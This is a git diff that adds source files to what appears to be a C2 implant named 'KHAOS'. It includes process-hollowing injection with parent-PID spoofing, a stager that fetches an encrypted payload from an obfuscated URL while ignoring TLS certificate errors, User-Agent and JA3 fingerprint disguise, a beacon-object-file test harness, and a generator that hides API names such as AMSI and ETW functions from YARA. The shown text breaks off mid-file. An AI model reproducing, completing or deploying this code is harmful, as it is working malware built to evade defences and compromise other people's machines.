a/agent/src/stager/hollow.c b/agent/src/stager/hollow.c new file mode 100644 index 0000000..b2f271b --- /dev/null +++ b/agent/src/stager/hollow.c @@ -0,0 +1,313 @@ +#include +#include "peb_walk.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include +#include + +/* NT function typedefs */ +typedef NTSTATUS (NTAPI *NtUnmapViewOfSection_t)(HANDLE ProcessHandle, + PVOID BaseAddress); + +typedef NTSTATUS (NTAPI *NtCreateSection_t)( + PHANDLE SectionHandle, + ACCESS_MASK DesiredAccess, + PVOID ObjectAttributes, + PLARGE_INTEGER MaximumSize, + ULONG SectionPageProtection, + ULONG AllocationAttributes, + HANDLE FileHandle); + +typedef NTSTATUS (NTAPI *NtMapViewOfSection_t)( + HANDLE SectionHandle, + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG_PTR ZeroBits, + SIZE_T CommitSize, + PLARGE_INTEGER SectionOffset, + PSIZE_T ViewSize, + ULONG InheritDisposition, /* 2 = ViewUnmap */ + ULONG AllocationType, + ULONG Win32Protect); + +typedef NTSTATUS (NTAPI *NtQIP_t)(HANDLE, ULONG, PVOID, ULONG, PULONG); + +#ifndef SEC_COMMIT +# define SEC_COMMIT 0x8000000 +#endif + +static DWORD _find_pid(const wchar_t *name) +{ + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) return 0; + PROCESSENTRY32W pe; + pe.dwSize = sizeof(pe); + DWORD pid = 0; + if (Process32FirstW(snap, &pe)) { + do { + if (_wcsicmp(pe.szExeFile, name) == 0) { pid = pe.th32ProcessID; break; } + } while (Process32NextW(snap, &pe)); + } + CloseHandle(snap); + return pid; +} + +static LPPROC_THREAD_ATTRIBUTE_LIST _make_parent_attr(HANDLE hParent, SIZE_T *out_sz) +{ + SIZE_T sz = 0; + InitializeProcThreadAttributeList(NULL, 1, 0, &sz); + LPPROC_THREAD_ATTRIBUTE_LIST al = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(sz); + if (!al) return NULL; + if (!InitializeProcThreadAttributeList(al, 1, 0, &sz) + || !UpdateProcThreadAttribute(al, 0, + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, + &hParent, sizeof(hParent), NULL, NULL)) { + free(al); return NULL; + } + *out_sz = sz; + return al; +} + +static void *_rva(const void *base, DWORD rva) { + return (BYTE *)base + rva; +} + +int hollow_inject(const uint8_t *pe_buf, size_t pe_len) +{ + if (pe_len < sizeof(IMAGE_DOS_HEADER)) return -1; + + const IMAGE_DOS_HEADER *dos = (const IMAGE_DOS_HEADER *)pe_buf; + if (dos->e_magic != IMAGE_DOS_SIGNATURE) return -1; + + const IMAGE_NT_HEADERS64 *nt = + (const IMAGE_NT_HEADERS64 *)(pe_buf + dos->e_lfanew); + if (nt->Signature != IMAGE_NT_SIGNATURE) return -1; + if (nt->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) return -1; + + DWORD ep_rva = nt->OptionalHeader.AddressOfEntryPoint; + SIZE_T img_size = nt->OptionalHeader.SizeOfImage; + LPVOID preferred = (LPVOID)nt->OptionalHeader.ImageBase; + + /* pick target: notepad.exe or dllhost.exe randomly */ + static const wchar_t *TARGETS[] = { + L"%SystemRoot%\\System32\\notepad.exe", + L"%SystemRoot%\\System32\\dllhost.exe", + }; + uint8_t pick = 0; + BCryptGenRandom(NULL, &pick, 1, BCRYPT_USE_SYSTEM_PREFERRED_RNG); + wchar_t target[MAX_PATH]; + ExpandEnvironmentStringsW(TARGETS[pick & 1], target, MAX_PATH); + + /* create suspended target with PPID spoofed to explorer.exe */ + DWORD ppid = _find_pid(L"explorer.exe"); + HANDLE hParent = ppid + ? OpenProcess(PROCESS_CREATE_PROCESS, FALSE, ppid) + : NULL; + + SIZE_T attr_sz = 0; + LPPROC_THREAD_ATTRIBUTE_LIST attr = hParent + ? _make_parent_attr(hParent, &attr_sz) + : NULL; + + STARTUPINFOEXW siex; + memset(&siex, 0, sizeof(siex)); + siex.StartupInfo.cb = sizeof(siex); + siex.lpAttributeList = attr; + + DWORD flags = CREATE_SUSPENDED | CREATE_NO_WINDOW; + if (attr) flags |= EXTENDED_STARTUPINFO_PRESENT; + + PROCESS_INFORMATION pi = {0}; + if (!CreateProcessW(NULL, target, NULL, NULL, FALSE, + flags, NULL, NULL, (LPSTARTUPINFOW)&siex, &pi)) { + if (attr) { DeleteProcThreadAttributeList(attr); free(attr); } + if (hParent) CloseHandle(hParent); + return -2; + } + if (attr) { DeleteProcThreadAttributeList(attr); free(attr); } + if (hParent) CloseHandle(hParent); + + /* resolve NT functions from ntdll */ + char _dn[10]; + EVS_D(_dn, EVS_dll_ntdll); + HMODULE ntdll = _peb_module(_dn); + SecureZeroMemory(_dn, sizeof(_dn)); + + char _fn[26]; + EVS_D(_fn, EVS_fn_NtUnmapViewOfSection); + NtUnmapViewOfSection_t NtUnmap = (NtUnmapViewOfSection_t)GetProcAddress(ntdll, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + EVS_D(_fn, EVS_fn_NtCreateSection); + NtCreateSection_t NtCSec = (NtCreateSection_t)GetProcAddress(ntdll, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + EVS_D(_fn, EVS_fn_NtMapViewOfSection); + NtMapViewOfSection_t NtMapVw = (NtMapViewOfSection_t)GetProcAddress(ntdll, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + EVS_D(_fn, EVS_fn_NtQueryInformationProcess); + NtQIP_t NtQIP = (NtQIP_t)GetProcAddress(ntdll, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + if (!NtCSec || !NtMapVw || !NtUnmap) goto kill; + + /* unmap original target image */ + NtUnmap(pi.hProcess, preferred); + + HANDLE hSection = NULL; + LARGE_INTEGER sec_sz; + sec_sz.QuadPart = (LONGLONG)img_size; + if (NtCSec(&hSection, SECTION_ALL_ACCESS, NULL, &sec_sz, + PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL) < 0) + goto kill; + + /* ---- Map into target process at preferred base ---- */ + + LPVOID remote_view = preferred; + SIZE_T view_sz = 0; + NTSTATUS st = NtMapVw(hSection, pi.hProcess, &remote_view, + 0, 0, NULL, &view_sz, + 2 /* ViewUnmap */, 0, PAGE_EXECUTE_READWRITE); + if (st < 0) { + /* preferred base taken, let kernel pick */ + remote_view = NULL; + view_sz = 0; + st = NtMapVw(hSection, pi.hProcess, &remote_view, + 0, 0, NULL, &view_sz, + 2, 0, PAGE_EXECUTE_READWRITE); + if (st < 0) { CloseHandle(hSection); goto kill; } + } + + /* map into current process RW for writing */ + LPVOID local_view = NULL; + view_sz = 0; + if (NtMapVw(hSection, GetCurrentProcess(), &local_view, + 0, 0, NULL, &view_sz, + 2 /* ViewUnmap */, 0, PAGE_READWRITE) < 0) { + NtUnmap(pi.hProcess, remote_view); + CloseHandle(hSection); + goto kill; + } + + /* build PE image in local view */ + uint8_t *img = (uint8_t *)local_view; + + /* copy headers */ + memcpy(img, pe_buf, nt->OptionalHeader.SizeOfHeaders); + + /* copy sections */ + IMAGE_NT_HEADERS64 *lnt = (IMAGE_NT_HEADERS64 *)(img + dos->e_lfanew); + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(lnt); + for (WORD i = 0; i < lnt->FileHeader.NumberOfSections; i++, sec++) { + if (!sec->SizeOfRawData) continue; + SIZE_T copy_sz = sec->SizeOfRawData < sec->Misc.VirtualSize + ? sec->SizeOfRawData : sec->Misc.VirtualSize; + memcpy(img + sec->VirtualAddress, + pe_buf + sec->PointerToRawData, + copy_sz); + } + + /* fix base relocations */ + INT64 delta = (INT64)remote_view - (INT64)nt->OptionalHeader.ImageBase; + if (delta) { + IMAGE_DATA_DIRECTORY *rd = + &lnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + if (rd->Size) { + IMAGE_BASE_RELOCATION *blk = + (IMAGE_BASE_RELOCATION *)_rva(img, rd->VirtualAddress); + while (blk->VirtualAddress && blk->SizeOfBlock >= sizeof(*blk)) { + DWORD cnt = (blk->SizeOfBlock - sizeof(*blk)) / sizeof(WORD); + WORD *ent = (WORD *)((BYTE *)blk + sizeof(*blk)); + for (DWORD j = 0; j < cnt; j++) { + if ((ent[j] >> 12) == IMAGE_REL_BASED_DIR64) { + INT64 *p = (INT64 *)_rva(img, + blk->VirtualAddress + (ent[j] & 0xFFF)); + *p += delta; + } + } + blk = (IMAGE_BASE_RELOCATION *)((BYTE *)blk + blk->SizeOfBlock); + } + } + } + + /* resolve imports */ + IMAGE_DATA_DIRECTORY *id = + &lnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; + if (id->Size) { + IMAGE_IMPORT_DESCRIPTOR *imp = + (IMAGE_IMPORT_DESCRIPTOR *)_rva(img, id->VirtualAddress); + while (imp->Name) { + HMODULE hmod = LoadLibraryA((char *)_rva(img, imp->Name)); + if (!hmod) { + NtUnmap(GetCurrentProcess(), local_view); + CloseHandle(hSection); + goto kill; + } + IMAGE_THUNK_DATA64 *iat = + (IMAGE_THUNK_DATA64 *)_rva(img, imp->FirstThunk); + IMAGE_THUNK_DATA64 *orig = imp->OriginalFirstThunk + ? (IMAGE_THUNK_DATA64 *)_rva(img, imp->OriginalFirstThunk) + : iat; + while (orig->u1.AddressOfData) { + FARPROC fn; + if (IMAGE_SNAP_BY_ORDINAL64(orig->u1.Ordinal)) + fn = GetProcAddress(hmod, + (LPCSTR)IMAGE_ORDINAL64(orig->u1.Ordinal)); + else { + IMAGE_IMPORT_BY_NAME *ibn = + (IMAGE_IMPORT_BY_NAME *)_rva(img, + (DWORD)orig->u1.AddressOfData); + fn = GetProcAddress(hmod, ibn->Name); + } + if (!fn) { + NtUnmap(GetCurrentProcess(), local_view); + CloseHandle(hSection); + goto kill; + } + iat->u1.Function = (ULONGLONG)fn; + iat++; orig++; + } + imp++; + } + } + + /* Update ImageBase in in-memory headers */ + lnt->OptionalHeader.ImageBase = (ULONGLONG)remote_view; + + /* Unmap local alias — shared section keeps data visible in target view */ + NtUnmap(GetCurrentProcess(), local_view); + CloseHandle(hSection); + + /* ---- Update PEB.ImageBaseAddress (single 8-byte write, negligible EDR signal) ---- */ + if (NtQIP) { + PROCESS_BASIC_INFORMATION pbi = {0}; + NtQIP(pi.hProcess, 0, &pbi, sizeof(pbi), NULL); + if (pbi.PebBaseAddress) + WriteProcessMemory(pi.hProcess, + (BYTE *)pbi.PebBaseAddress + 0x10, + &remote_view, sizeof(PVOID), NULL); + } + + /* ---- Redirect entry point ---- */ + CONTEXT ctx; + memset(&ctx, 0, sizeof(ctx)); + ctx.ContextFlags = CONTEXT_FULL; + if (!GetThreadContext(pi.hThread, &ctx)) goto kill; + ctx.Rip = (DWORD64)remote_view + ep_rva; + if (!SetThreadContext(pi.hThread, &ctx)) goto kill; + + ResumeThread(pi.hThread); + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + return 0; + +kill: + TerminateProcess(pi.hProcess, 1); + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); + return -9; +} diff --git a/agent/src/stager/stager.c b/agent/src/stager/stager.c new file mode 100644 index 0000000..38ea797 --- /dev/null +++ b/agent/src/stager/stager.c @@ -0,0 +1,130 @@ +#include +#include +#include +#include +#include +#include "crypto.h" +#include "stager_config.h" + +/* Defined in hollow.c */ +extern int hollow_inject(const uint8_t *pe_buf, size_t pe_len); + +/* XOR deobfuscation of config values */ +static void _cfg_decode(const unsigned char *src, size_t len, char *dst) +{ + for (size_t i = 0; i < len; i++) + dst[i] = (char)(src[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]); + dst[len] = '\0'; +} + +/* download URL into malloc'd buffer */ +static uint8_t *_http_get(const char *url, size_t *out_len) +{ + *out_len = 0; + + wchar_t url_w[512] = {0}; + MultiByteToWideChar(CP_UTF8, 0, url, -1, url_w, 512); + + wchar_t host[256] = {0}, path[512] = {0}; + URL_COMPONENTS uc = { + .dwStructSize = sizeof(uc), + .lpszHostName = host, .dwHostNameLength = 256, + .lpszUrlPath = path, .dwUrlPathLength = 512, + }; + if (!WinHttpCrackUrl(url_w, 0, 0, &uc)) return NULL; + + BOOL secure = (uc.nScheme == INTERNET_SCHEME_HTTPS); + INTERNET_PORT port = uc.nPort ? uc.nPort : (INTERNET_PORT)(secure ? 443 : 80); + + HINTERNET hS = WinHttpOpen(L"Mozilla/5.0", + WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, + WINHTTP_NO_PROXY_BYPASS, 0); + if (!hS) return NULL; + + HINTERNET hC = WinHttpConnect(hS, host, port, 0); + if (!hC) { WinHttpCloseHandle(hS); return NULL; } + + HINTERNET hR = WinHttpOpenRequest(hC, L"GET", path, + NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, + secure ? WINHTTP_FLAG_SECURE : 0); + if (!hR) { WinHttpCloseHandle(hC); WinHttpCloseHandle(hS); return NULL; } + + if (secure) { + DWORD opts = SECURITY_FLAG_IGNORE_UNKNOWN_CA + | SECURITY_FLAG_IGNORE_CERT_CN_INVALID + | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID + | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE; + WinHttpSetOption(hR, WINHTTP_OPTION_SECURITY_FLAGS, &opts, sizeof(opts)); + } + WinHttpSetTimeouts(hR, 30000, 30000, 30000, 30000); + + if (!WinHttpSendRequest(hR, WINHTTP_NO_ADDITIONAL_HEADERS, 0, + WINHTTP_NO_REQUEST_DATA, 0, 0, 0) || + !WinHttpReceiveResponse(hR, NULL)) { + WinHttpCloseHandle(hR); WinHttpCloseHandle(hC); WinHttpCloseHandle(hS); + return NULL; + } + + uint8_t *buf = NULL; + size_t len = 0; + DWORD avail; + while (WinHttpQueryDataAvailable(hR, &avail) && avail > 0) { + uint8_t *tmp = realloc(buf, len + avail); + if (!tmp) break; + buf = tmp; + DWORD nread = 0; + WinHttpReadData(hR, buf + len, avail, &nread); + len += nread; + } + WinHttpCloseHandle(hR); WinHttpCloseHandle(hC); WinHttpCloseHandle(hS); + + if (buf) *out_len = len; + return buf; +} + +/* entry point */ + +int WINAPI WinMain(HINSTANCE h, HINSTANCE hp, LPSTR cmd, int show) +{ + (void)h; (void)hp; (void)cmd; (void)show; + + /* decode staging URL */ + char url[512] = {0}; + _cfg_decode(CFG_STAGE_URL, CFG_STAGE_URL_LEN, url); + + /* decode ChaCha20 key */ + uint8_t key[CHACHA20_KEY_SIZE] = {0}; + for (int i = 0; i < CHACHA20_KEY_SIZE; i++) + key[i] = CFG_STAGE_KEY[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]; + + /* download encrypted stage */ + size_t blob_len = 0; + uint8_t *blob = _http_get(url, &blob_len); + if (!blob) return 1; + + /* wire format: nonce(12) | ciphertext | tag(16) */ + if (blob_len < CHACHA20_NONCE_SIZE + POLY1305_TAG_SIZE + 64) { + free(blob); return 1; + } + + const uint8_t *nonce = blob; + size_t ct_len = blob_len - CHACHA20_NONCE_SIZE - POLY1305_TAG_SIZE; + const uint8_t *ct = blob + CHACHA20_NONCE_SIZE; + const uint8_t *tag = blob + CHACHA20_NONCE_SIZE + ct_len; + + uint8_t *pe = (uint8_t *)malloc(ct_len); + if (!pe) { free(blob); return 1; } + + int rc = chacha20_poly1305_decrypt(key, nonce, ct, ct_len, tag, pe); + SecureZeroMemory(key, sizeof(key)); + SecureZeroMemory(blob, blob_len); + free(blob); + + if (rc != 0) { free(pe); return 1; } + + /* Inject into suspended notepad.exe */ + rc = hollow_inject(pe, ct_len); + SecureZeroMemory(pe, ct_len); + free(pe); + return (rc == 0) ? 0 : 1; +} \ No newline at end of file diff --git a/agent/src/util.c b/agent/src/util.c new file mode 100644 index 0000000..b1ab1bf --- /dev/null +++ b/agent/src/util.c @@ -0,0 +1,61 @@ +#include "util.h" +#include + +#ifndef HTTP_ONLY +#include +#ifndef CURLSSLOPT_NATIVE_CA +#define CURLSSLOPT_NATIVE_CA (1<<4) +#endif +#endif /* HTTP_ONLY */ + +/* ---- User-Agent rotation ---- */ + +static const char *k_ua[] = { + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", +}; + +#define UA_COUNT (sizeof(k_ua) / sizeof(k_ua[0])) + +const char *random_ua(void) +{ + return k_ua[rand() % UA_COUNT]; +} + +#ifndef HTTP_ONLY +/* ---- JA3 hardening ---- */ + +void curl_apply_opsec(CURL *curl) +{ + /* TLS 1.3 ciphers — Chrome order */ + curl_easy_setopt(curl, CURLOPT_TLS13_CIPHERS, + "TLS_AES_128_GCM_SHA256:" + "TLS_AES_256_GCM_SHA384:" + "TLS_CHACHA20_POLY1305_SHA256"); + + /* TLS 1.2 ciphers — Chrome order */ + curl_easy_setopt(curl, CURLOPT_SSL_CIPHER_LIST, + "ECDHE-ECDSA-AES128-GCM-SHA256:" + "ECDHE-RSA-AES128-GCM-SHA256:" + "ECDHE-ECDSA-AES256-GCM-SHA384:" + "ECDHE-RSA-AES256-GCM-SHA384:" + "ECDHE-ECDSA-CHACHA20-POLY1305:" + "ECDHE-RSA-CHACHA20-POLY1305:" + "ECDHE-RSA-AES128-SHA:" + "ECDHE-RSA-AES256-SHA:" + "AES128-GCM-SHA256:" + "AES256-GCM-SHA384:" + "AES128-SHA:" + "AES256-SHA"); + + /* Windows native cert store — no curl-ca-bundle.crt on disk */ + curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 1L); + curl_easy_setopt(curl, CURLOPT_SSL_OPTIONS, (long)CURLSSLOPT_NATIVE_CA); +} +#endif /* HTTP_ONLY */ diff --git a/agent/tests/bof_hello.c b/agent/tests/bof_hello.c new file mode 100644 index 0000000..fe4f764 --- /dev/null +++ b/agent/tests/bof_hello.c @@ -0,0 +1,23 @@ +// test BOF: DLL$Function convention + BeaconPrintf +// compile: gcc -c bof_hello.c -o bof_hello.o +#include + +void BeaconPrintf(int type, const char *fmt, ...); + +// DLL$Function — loader strips prefix and resolves from named dll +BOOL ADVAPI32$GetUserNameA(LPSTR buf, LPDWORD sz); +DWORD KERNEL32$GetCurrentProcessId(void); + +void go(char *args, int len) +{ + (void)args; (void)len; + + char user[256] = {0}; + DWORD usersz = (DWORD)sizeof(user); + ADVAPI32$GetUserNameA(user, &usersz); + + DWORD pid = KERNEL32$GetCurrentProcessId(); + + BeaconPrintf(0, "[BOF] Hello from KHAOS BOF loader!\n"); + BeaconPrintf(0, "[BOF] User: %s | PID: %lu\n", user, (unsigned long)pid); +} diff --git a/agent/tests/test_bof.c b/agent/tests/test_bof.c new file mode 100644 index 0000000..aa0fc57 --- /dev/null +++ b/agent/tests/test_bof.c @@ -0,0 +1,170 @@ +// standalone harness: loads a COFF .o, b64-encodes it, runs cmd_bof() +// build: gcc -O0 -Iinclude tests/test_bof.c bof.o -o test_bof.exe -lkernel32 -ladvapi32 +// run: test_bof.exe tests/bof_hello.o +#include +#include +#include +#include +#include +#include "bof.h" +#include "adv_lazy.h" + +// stub for _bp_is_admin shim in bof.o +const adv_api_t *adv_get(void) +{ + static adv_api_t a; + static int init = 0; + if (!init) { + HMODULE adv = LoadLibraryA("advapi32.dll"); + if (adv) { + a.OpenProcessToken = (void *)GetProcAddress(adv, "OpenProcessToken"); + a.AdjustTokenPrivileges = (void *)GetProcAddress(adv, "AdjustTokenPrivileges"); + a.DuplicateTokenEx = (void *)GetProcAddress(adv, "DuplicateTokenEx"); + a.ImpersonateLoggedOnUser = (void *)GetProcAddress(adv, "ImpersonateLoggedOnUser"); + a.LogonUserA = (void *)GetProcAddress(adv, "LogonUserA"); + a.LookupPrivilegeNameA = (void *)GetProcAddress(adv, "LookupPrivilegeNameA"); + a.LookupPrivilegeValueA = (void *)GetProcAddress(adv, "LookupPrivilegeValueA"); + a.OpenThreadToken = (void *)GetProcAddress(adv, "OpenThreadToken"); + a.RevertToSelf = (void *)GetProcAddress(adv, "RevertToSelf"); + a.CloseServiceHandle = (void *)GetProcAddress(adv, "CloseServiceHandle"); + a.EnumServicesStatusExA = (void *)GetProcAddress(adv, "EnumServicesStatusExA"); + a.OpenSCManagerA = (void *)GetProcAddress(adv, "OpenSCManagerA"); + a.OpenServiceA = (void *)GetProcAddress(adv, "OpenServiceA"); + a.QueryServiceConfigA = (void *)GetProcAddress(adv, "QueryServiceConfigA"); + } + init = 1; + } + return &a; +} + +// required by bof.o — must match signature in crypto.h +static const int DEC[256] = { + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63, + 52,53,54,55,56,57,58,59,60,61,-1,-1,-1, 0,-1,-1, + -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14, + 15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1, + -1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, + 41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, + -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1, +}; + +uint8_t *base64_decode(const char *str, size_t *out_len) +{ + if (!str) { if (out_len) *out_len = 0; return NULL; } + size_t slen = strlen(str); + if (slen == 0) { if (out_len) *out_len = 0; return (uint8_t *)calloc(1, 1); } + + size_t pad = 0; + if (slen >= 1 && str[slen-1] == '=') { pad++; slen--; } + if (slen >= 1 && str[slen-1] == '=') { pad++; slen--; } + + size_t dlen = (slen * 3) / 4; + uint8_t *out = (uint8_t *)malloc(dlen + 1); + if (!out) { if (out_len) *out_len = 0; return NULL; } + + size_t i = 0, o = 0; + while (i + 3 < slen + pad) { + unsigned char c0 = (i < slen) ? (unsigned char)str[i] : 0; + unsigned char c1 = (i+1 < slen) ? (unsigned char)str[i+1] : 0; + unsigned char c2 = (i+2 < slen) ? (unsigned char)str[i+2] : 0; + unsigned char c3 = (i+3 < slen) ? (unsigned char)str[i+3] : 0; + + int v0 = DEC[c0], v1 = DEC[c1], v2 = DEC[c2], v3 = DEC[c3]; + if (v0 < 0 || v1 < 0) break; + + uint32_t triple = ((uint32_t)v0 << 18) | ((uint32_t)v1 << 12) + | ((uint32_t)(v2 >= 0 ? v2 : 0) << 6) + | (uint32_t)(v3 >= 0 ? v3 : 0); + + if (o < dlen) out[o++] = (uint8_t)((triple >> 16) & 0xff); + if (o < dlen && (i+2 < slen)) out[o++] = (uint8_t)((triple >> 8) & 0xff); + if (o < dlen && (i+3 < slen)) out[o++] = (uint8_t)(triple & 0xff); + i += 4; + } + out[o] = '\0'; + if (out_len) *out_len = o; + return out; +} + +static const char ENC[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; + +static char *b64_encode(const uint8_t *data, size_t len) +{ + size_t out_len = 4 * ((len + 2) / 3) + 1; + char *out = (char *)malloc(out_len); + if (!out) return NULL; + + size_t i, o = 0; + for (i = 0; i + 2 < len; i += 3) { + out[o++] = ENC[(data[i] >> 2) & 0x3f]; + out[o++] = ENC[((data[i] & 3) << 4) | (data[i+1] >> 4)]; + out[o++] = ENC[((data[i+1] & 0xf)<< 2) | (data[i+2] >> 6)]; + out[o++] = ENC[ data[i+2] & 0x3f]; + } + if (i < len) { + out[o++] = ENC[(data[i] >> 2) & 0x3f]; + if (i + 1 < len) { + out[o++] = ENC[((data[i] & 3) << 4) | (data[i+1] >> 4)]; + out[o++] = ENC[(data[i+1] & 0xf) << 2]; + } else { + out[o++] = ENC[(data[i] & 3) << 4]; + out[o++] = '='; + } + out[o++] = '='; + } + out[o] = '\0'; + return out; +} + +int main(int argc, char **argv) +{ + if (argc < 2) { + fprintf(stderr, "usage: test_bof.exe [args_b64]\n"); + return 1; + } + + FILE *f = fopen(argv[1], "rb"); + if (!f) { + fprintf(stderr, "[-] cannot open: %s\n", argv[1]); + return 1; + } + fseek(f, 0, SEEK_END); + long fsz = ftell(f); + rewind(f); + + uint8_t *coff_raw = (uint8_t *)malloc((size_t)fsz); + if (!coff_raw) { fclose(f); return 1; } + fread(coff_raw, 1, (size_t)fsz, f); + fclose(f); + + char *coff_b64 = b64_encode(coff_raw, (size_t)fsz); + free(coff_raw); + if (!coff_b64) { fprintf(stderr, "[-] b64_encode failed\n"); return 1; } + + const char *args_b64 = (argc >= 3) ? argv[2] : NULL; + + printf("[*] COFF: %s (%ld bytes, b64=%zu chars)\n", argv[1], fsz, strlen(coff_b64)); + printf("[*] Calling cmd_bof()...\n"); + fflush(stdout); + + char output[65536] = {0}; + int ret = cmd_bof(coff_b64, args_b64, output, sizeof(output)); + free(coff_b64); + + printf("[*] cmd_bof() = %d\n", ret); + if (output[0]) + printf("[*] BOF output:\n%s", output); + else + printf("[*] BOF output: (empty)\n"); + + return (ret == 0) ? 0 : 1; +} diff --git a/agent/tools/gen_evs_strings.py b/agent/tools/gen_evs_strings.py new file mode 100644 index 0000000..78ff410 --- /dev/null +++ b/agent/tools/gen_evs_strings.py @@ -0,0 +1,319 @@ +#!/usr/bin/env python3 +""" +Generate agent/include/evs_strings.h — per-build random XOR key for all +API / DLL name obfuscation arrays. Replaces the hardcoded 0xba constant +that was a static YARA signature. + +Run: python tools/gen_evs_strings.py +Called automatically by: make config +""" +import os +import secrets + +# ── Master string table ──────────────────────────────────────────────────── +# name → C identifier suffix (EVS_) +STRINGS = { + # DLL names + "ntdll.dll": "dll_ntdll", + "kernel32.dll": "dll_kernel32", + "kernelbase.dll": "dll_kernelbase", + "xpsservices.dll": "dll_xpsservices", + "advapi32.dll": "dll_advapi32", + "amsi.dll": "dll_amsi", + "secur32.dll": "dll_secur32", + "netapi32.dll": "dll_netapi32", + "winhttp.dll": "dll_winhttp", + "gdi32.dll": "dll_gdi32", + "user32.dll": "dll_user32", + + # Nt* syscall names (ntdll) + "NtOpenProcess": "fn_NtOpenProcess", + "NtAllocateVirtualMemory": "fn_NtAllocateVirtualMemory", + "NtWriteVirtualMemory": "fn_NtWriteVirtualMemory", + "NtProtectVirtualMemory": "fn_NtProtectVirtualMemory", + "NtCreateThreadEx": "fn_NtCreateThreadEx", + "NtClose": "fn_NtClose", + "NtOpenThread": "fn_NtOpenThread", + "NtSuspendThread": "fn_NtSuspendThread", + "NtResumeThread": "fn_NtResumeThread", + "NtGetContextThread": "fn_NtGetContextThread", + "NtSetContextThread": "fn_NtSetContextThread", + "NtQueueApcThread": "fn_NtQueueApcThread", + "NtCreateSection": "fn_NtCreateSection", + "NtMapViewOfSection": "fn_NtMapViewOfSection", + "NtUnmapViewOfSection": "fn_NtUnmapViewOfSection", + "NtReadVirtualMemory": "fn_NtReadVirtualMemory", + "NtQueryInformationProcess": "fn_NtQueryInformationProcess", + "NtContinue": "fn_NtContinue", + "NtWaitForSingleObject": "fn_NtWaitForSingleObject", + + # ntdll helpers / ETW + "RtlCaptureContext": "fn_RtlCaptureContext", + "RtlUserThreadStart": "fn_RtlUserThreadStart", + "EtwEventWrite": "fn_EtwEventWrite", + "EtwTiLogOpenProcess": "fn_EtwTiLogOpenProcess", + "EtwTiLogReadWriteVm": "fn_EtwTiLogReadWriteVm", + "EtwTiLogDuplicateHandle": "fn_EtwTiLogDuplicateHandle", + + # AMSI (amsi.dll) + "AmsiScanBuffer": "fn_AmsiScanBuffer", + "AmsiScanString": "fn_AmsiScanString", + + # advapi32.dll + "AdjustTokenPrivileges": "fn_AdjustTokenPrivileges", + "DuplicateTokenEx": "fn_DuplicateTokenEx", + "ImpersonateLoggedOnUser": "fn_ImpersonateLoggedOnUser", + "LogonUserA": "fn_LogonUserA", + "LookupPrivilegeNameA": "fn_LookupPrivilegeNameA", + "LookupPrivilegeValueA": 